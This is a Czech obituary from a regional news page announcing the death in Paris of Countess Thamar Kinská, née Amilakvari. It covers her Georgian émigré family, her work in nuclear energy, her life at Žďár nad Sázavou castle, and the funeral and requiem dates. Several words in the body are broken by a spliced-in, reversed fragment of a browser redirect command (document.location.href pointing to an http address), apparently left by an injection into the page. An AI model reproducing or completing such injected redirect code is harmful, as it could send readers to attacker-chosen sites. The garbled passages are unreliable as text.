Rainbow page separator

Smutná zpráva zasáhla rodinu Kinských ve Žďáru nad Sázavou

Sobota, 20. dubna 2019

Žďár nad Sázavou / Dne 17. dubna 2019 zesnula v rodinném kruhu v Paříži hraběnka Kinská z Wchynic a Te[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova, rozená kněžna Thamar Amilakvari.

Paní Thamar se narodila ve Francii v roce 1935. Její rodina pocházela z Gruzie, odkud emigrovala před Stalinovým terorem. Její otec Dimitri Amilakvari se stal legendární postavou Francouzské cizinecké legie a padl za de Gaulleovy Svobodné Francouze u El Alamein v boji proti Hitlerovi. Část rodiny, která ještě zůstala v Gruzii, byla za Stalina systematicky vyvražděná, případně perzekuovaná.

V roce 1958 se vdala za svého vzdáleného příbuzného hraběte Radslava Kinského po jeho emigraci do Francie. Měla dva syny – Constantina, žijícího ve Žďáru nad Sázavou a Karla Mikuláše, žijícího v Paříži. Po celý svůj profesionální život se věnovala jaderné energii ve Francouzském Commissariat á l’énergie a[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomique a v Mezinárodní agentuře pro a[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomovou energii a hovořila pěti jazyky. Po navrácení majetku rodině Kinských v restitucích se s manželem Radslavem Kinským zabydlela na Zámku ve Žďáru nad Sázavou. Milovala krásy Žďárska a v okolí měla také mnoho přátel. Boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou síť přátel měla také po celém světě a využívala ji pro podporu rozvoje Žďáru a České republiky (například díky Evropské chartě cisterciáckých památek, jehož prvním českým členem se stal právě Žďár). Byla společenská a milovala svoji zahradu, kterou mohli návštěvníci každoročně obdivovat při zámeckých Dnech otevřených zahrad. S hraběnkou Thamar Kinsky odchází moudrý, hluboce kulturní a přívětivý člověk a významná osobnost našeho regionu.

Pohřební mše bude slavena v úterý 23. dubna 2019 v 15 hodin v gruzínské pravoslavné kapli Sv. Nino, 6 rue de la Rosière, v Paříži. Bude pohřbená v rodinným hrobu Amilakvari v Paříži.

Rekviem se uskuteční v sobotu 11. května 2019 v 15 hodin v bazilice Nanebevzetí Panny Marie a sv. Mikuláše ve Žďáře nad Sázavou.